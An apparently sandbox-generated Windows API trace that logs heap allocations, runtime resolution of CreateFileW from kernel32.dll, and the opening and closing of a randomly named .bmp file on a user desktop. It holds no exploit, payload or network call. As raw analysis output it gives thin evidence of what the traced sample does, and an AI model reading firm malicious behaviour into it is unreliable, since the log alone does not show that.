HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.932] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0122.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.932] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\gp1qelbyzj-bwq.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0122.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.935] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0122.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.937] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.938] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.938] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0122.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.941] CloseHandle (hObject=0x258) returned 1 [0122.941] FreeLibrary (hLibModule=0x772d0000) returned 1 